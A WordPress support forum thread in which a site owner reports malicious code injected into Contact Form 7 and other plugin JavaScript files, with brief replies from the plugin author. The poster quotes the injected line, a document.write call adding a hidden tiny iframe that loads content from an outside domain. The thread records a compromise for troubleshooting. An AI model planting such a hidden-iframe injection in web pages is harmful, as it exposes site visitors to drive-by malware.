Contact Form 7 malware attached to scripts

  • vaschops

    (@vaschops)


    12 years ago

    Hi..

    I am having repeated issues on multiple websites that i use CF7 with malware attached to some scripts…identified as code injection by webmaster tools…
    The websites are being ‘blocked’ by google…and the browser…landing on a message page instead the url homepage…saying “The Website Ahead Contains Malware!”.

    The url of the malware is like this:
    https://…/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1

    The code inserted is:

    document.write('<iframe src="https://jnvzpp.sellClassics.com/
geographicallyconquering.cgi?8" scrolling="auto" frameborder
="no" align="center" height="5" width="5"></iframe>');

    I tried removing the iframe that appears inserted at the bottom of all of the scripts in the JS folder of CF7…manually…but i dont yet know if they will be regenerated by another kind of script.

    From forums i read there a security breach to a lot of sites through CF7.
    Some quoted that by removing the plugin removed the problem as well.
    I will have to do the same if there is no action addressed to this security problem.

    Could someone from the developers comment on this?

    Or…if anyone else who has resolved this issue…could shed some light to this troubling case.

    Thank u for a great plugin…We ought to keep it that way.

    .v.

    https://www.ads-software.com/extend/plugins/contact-form-7/

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Takayuki Miyoshi

    (@takayukister)

    Where is the site? When did you realize the issue first?

    Thread Starter vaschops

    (@vaschops)

    Hi again…

    I have to say that the problem goes further than CF7.
    Yesterday i cleaned the injected code from JS files of CF7…
    …and today i had new injected codes in Shortcodes Ultimate JS files.
    I also installed a plugin, Simple Login Log…to help me find out if there is any hidden user trying to login…and there was one failed attempt as ‘admin’…(there is no register user like that)

    So…i dont know how these breaches occur.

    The site is https://www.eloundaisland.gr

    Now…if the same security issues occur for all plugins that use JS files…i m not sure…

    Please comment if u know…or can see something i dont…

    Thanks for your quick reply.

    Plugin Author Takayuki Miyoshi

    (@takayukister)

    Take steps written in FAQ My site was hacked. Then if you find the cause, please report it here.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Contact Form 7 malware attached to scripts’ is closed to new replies.

Tags